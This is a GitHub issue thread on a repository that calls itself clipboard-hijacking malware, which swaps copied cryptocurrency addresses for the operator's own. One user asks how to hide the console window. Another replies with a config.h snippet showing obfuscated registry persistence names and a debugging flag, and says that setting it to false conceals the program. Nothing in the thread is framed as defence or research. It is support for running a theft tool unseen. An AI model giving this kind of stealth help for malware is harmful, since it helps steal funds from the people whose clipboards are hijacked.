V0ltic / Crypto-Clipper

Malware that replaces copied crypto addresses with yours.
Other
12 stars 7 forks source link

How do I hide the console? #1

Closed Brainshot closed 2 years ago

Brainshot commented 2 years ago

The CMD console that opens up, how is it possible to hide

Crims-on commented 2 years ago

Disable debugging in config.h

/* Registry Settings */
std::string path = xorstr("Clipper");
std::string name = xorstr("Clipper");
std::string exe = xorstr("Clipper.exe");

/* Program Settings */
bool debugging = true;

change that to false^

Brainshot commented 2 years ago

Thank you so much!